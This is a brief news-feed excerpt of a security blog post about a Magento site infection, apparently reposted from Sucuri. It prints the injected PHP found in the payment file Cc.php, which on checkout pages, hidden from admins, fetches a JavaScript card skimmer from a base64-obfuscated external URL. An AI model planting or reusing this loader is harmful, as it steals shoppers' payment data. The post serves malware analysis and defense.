Email Marketing News & updates

Magento PHP Injection Loads JavaScript Skimmer

Magento PHP Injection Loads JavaScript SkimmerA Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php


if ($_SERVER[“REQUEST_METHOD”] === “GET”){
if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){
if(!isset($_COOKIE[“adminhtml”])){
echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”));
}
}
}

To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.

Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.

Source: Scuri check